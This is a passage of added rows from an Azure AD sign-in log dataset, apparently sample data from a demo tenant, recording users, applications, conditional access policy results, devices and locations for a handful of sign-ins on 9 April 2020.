+526,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,300526cd-6890-4f53-95eb-96901ae0230c,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5949abe0-9b87-40bf-991e-6df7d25b1a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,5949abe0-9b87-40bf-991e-6df7d25b1a00,SigninLogs,Sucess,50.6406517,5.572050095
+527,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:42.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,48d247a7-8721-47eb-9c46-ed06ccf722be,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:08,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",71aa5f40-2333-4930-9dde-1255f8005100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,71aa5f40-2333-4930-9dde-1255f8005100,SigninLogs,Sucess,32.32146072,34.85319901
+528,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:08.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,451012b4-9a00-45d1-8e5f-e78405f776ea,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 04:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c0ce23b7-81fe-4875-94a5-4bf359840b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0ce23b7-81fe-4875-94a5-4bf359840b00,SigninLogs,Sucess,36.6404686,-78.26995087
+529,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:15.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0b636dbf-fe9e-4895-97d5-311a7b003a0f,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ac9a90bc-e2ad-45f7-b2a8-b41593801d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ac9a90bc-e2ad-45f7-b2a8-b41593801d00,SigninLogs,Sucess,33.45851135,-82.21336365
+530,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:44.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1ae14d5e-f008-4f13-8cc7-66da396a0ede,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 19:16,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",d4cfa5d7-9318-4cda-bb70-205f44b20100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d4cfa5d7-9318-4cda-bb70-205f44b20100,SigninLogs,Sucess,32.32146072,34.85319901
+531,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:05.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,782f64ee-9c39-4846-81da-fc7108ca0776,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",880871e0-6cdc-4638-a95e-74bc0b422900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,880871e0-6cdc-4638-a95e-74bc0b422900,SigninLogs,Failed,47.68061829,-122.1869888
+532,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:42.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,19b8a429-fe14-42e0-8a7b-bd1bf9ef9ffc,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:46,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",a48528e7-db61-4f27-8758-ce2f51880100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,a48528e7-db61-4f27-8758-ce2f51880100,SigninLogs,Sucess,32.32146072,34.85319901
+533,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:28.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a7180b7e-6808-4ac2-9340-c973bb0ea98c,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:18,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Chrome 80.0.3987', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",f132c322-8c82-4899-af58-5ed4abc22200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f132c322-8c82-4899-af58-5ed4abc22200,SigninLogs,Sucess,29.4803009,-81.21395111
